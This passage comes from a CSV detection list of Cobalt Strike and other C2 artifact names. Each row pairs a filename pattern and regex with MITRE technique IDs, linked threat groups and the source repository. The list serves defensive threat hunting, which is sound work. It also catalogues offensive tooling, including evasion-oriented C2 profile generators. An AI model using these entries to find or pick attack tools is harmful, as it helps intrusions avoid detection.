"*beacon.*winsrv.dll*",".{0,1000}beacon\..{0,1000}winsrv\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","35632"
"*beacon.CommandBuilder*",".{0,1000}beacon\.CommandBuilder.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","35633"
"*beacon.dll*",".{0,1000}beacon\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35634"
"*beacon.elf*",".{0,1000}beacon\.elf.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","35635"
"*beacon.exe*",".{0,1000}beacon\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35636"
"*beacon.exe*",".{0,1000}beacon\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35637"
"*beacon.nim*",".{0,1000}beacon\.nim.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","N/A","10","10","84","13","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z","35638"
"*Beacon.Object.File.zip*",".{0,1000}Beacon\.Object\.File\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","N/A","10","10","304","55","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z","35639"
"*beacon.ps1*beacon.exe*",".{0,1000}beacon\.ps1.{0,1000}beacon\.exe.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","35640"
"*beacon.x64*.dll*",".{0,1000}beacon\.x64.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35641"
"*beacon.x64*.exe*",".{0,1000}beacon\.x64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35642"
"*beacon.x64.dll*",".{0,1000}beacon\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","35643"
"*beacon.x86*.dll*",".{0,1000}beacon\.x86.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35644"
"*beacon.x86*.exe*",".{0,1000}beacon\.x86.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35645"
"*beacon_api.h*",".{0,1000}beacon_api\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/ELFLoader","1","0","N/A","N/A","10","10","268","45","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z","35646"
"*beacon_bottom *",".{0,1000}beacon_bottom\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35647"
"*Beacon_Com_Struct*",".{0,1000}Beacon_Com_Struct.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - 